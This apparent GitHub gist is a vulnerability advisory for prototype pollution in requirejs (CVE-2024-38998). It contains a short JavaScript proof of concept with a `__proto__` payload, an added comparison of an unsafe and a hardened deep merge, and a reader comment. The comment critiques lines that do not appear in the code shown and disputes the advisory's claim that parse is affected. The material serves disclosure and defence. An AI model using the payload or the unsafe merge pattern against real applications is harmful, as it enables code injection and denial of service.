@mestrtee
Last active July 29, 2024 20:16
[CVE-2024-38998] Vulnerability Advisory: Prototype Pollution in requirejs, versions <= 2.3.6

Vulnerability type: Prototype Pollution

CVSS Score: 8.4 HIGH

Vendor of the Package: jrburke

Affected Package:

  • Product: requirejs
  • Version: 2.3.6

Affected component(s):

config, s.contexts._.configure, parse

Attack vector(s): an attacker can modify the built-in Object.prototype by calling one of the vulnerable functions (config, s.contexts._.configure, parse) with an argument that contains the special property __proto__. Polluting the prototype alters the application logic and can be escalated to denial of service, remote code execution or cross-site scripting, depending on the gadgets reachable in the application.

Description: Affected versions of this package are vulnerable to Prototype Pollution through the functions config, s.contexts._.configure and parse. An attacker can alter the behavior of all objects inheriting from the affected prototype by passing arguments to the vulnerable function crafted with the built-in property __proto__. The attack can potentially be escalated to denial of service, remote code execution or cross-site scripting, depending on the gadgets affected by the pollution.

Proof-of-Concept:

```javascript
(async () => {
  const lib = await import('requirejs');

  // Any plain object inherits from Object.prototype, so it serves as a witness.
  var victim = {};

  console.log("Before Attack: ", JSON.stringify(victim.__proto__));

  try {
    // JSON.parse creates an own "__proto__" key; the config merge then writes into Object.prototype.
    lib.config(JSON.parse('{"__proto__":{"test":123}}'));
    lib.s.contexts._.configure(JSON.parse('{"__proto__":{"test":123}}'));
  } catch (e) { }

  console.log("After Attack: ", JSON.stringify(victim.__proto__));

  // Clean up the polluted property.
  delete Object.prototype.test;
})();
```
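As an added example (not requirejs's own code, which this page does not reproduce), the snippet below uses a simplified recursive config merge as a stand-in for the kind of deep merge the advisory describes: the naive version shows why a JSON body with an own `__proto__` key ends up writing into `Object.prototype`, the hardened version skips the dangerous keys and uses null-prototype containers, and `isPolluted` is the check a defender can run before and after processing untrusted configuration.

```javascript
// Added example, not requirejs's own code: simplified stand-in for a config deep merge.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const isPlainObject = (v) => v !== null && typeof v === 'object' && !Array.isArray(v);

// Naive recursive merge. JSON.parse('{"__proto__":{...}}') yields an object with
// an OWN key "__proto__", so target[key] resolves (via the accessor) to
// Object.prototype and the recursion writes straight into it.
function unsafeMerge(target, source) {
  for (const key in source) {
    const value = source[key];
    if (isPlainObject(value)) {
      if (!isPlainObject(target[key])) target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened merge: own keys only, dangerous keys skipped, and nested containers
// created with a null prototype so lookups can never walk up the chain.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || !isPlainObject(target[key])) target[key] = Object.create(null);
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Detection probe: a fresh empty object must not see `name` anywhere on its chain.
const isPolluted = (name) => name in {};

// Runs the advisory's payload through both merges and reports the probe results.
function demo() {
  const payload = () => JSON.parse('{"__proto__":{"test":123}}');
  const before = isPolluted('test');
  unsafeMerge({}, payload());
  const afterUnsafe = isPolluted('test');
  delete Object.prototype.test; // undo the unsafe run before the safe one
  safeMerge({}, payload());
  return { before, afterUnsafe, afterSafe: isPolluted('test') };
}
```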

artola commented Jul 15, 2024

@mestrtee Big thanks.

The above snippet confirms the possibility of injection.

Here are some findings regarding such code.

The line `lib.parse('{"__proto__":{"test":123}}'))` seems wrong:

  • the number of parentheses does not match
  • `parse` does not exist on `lib`

The line `delete Object.prototype.polluted;` seems wrong:

  • it should remove the injected prop `test`: `delete Object.prototype.test;`
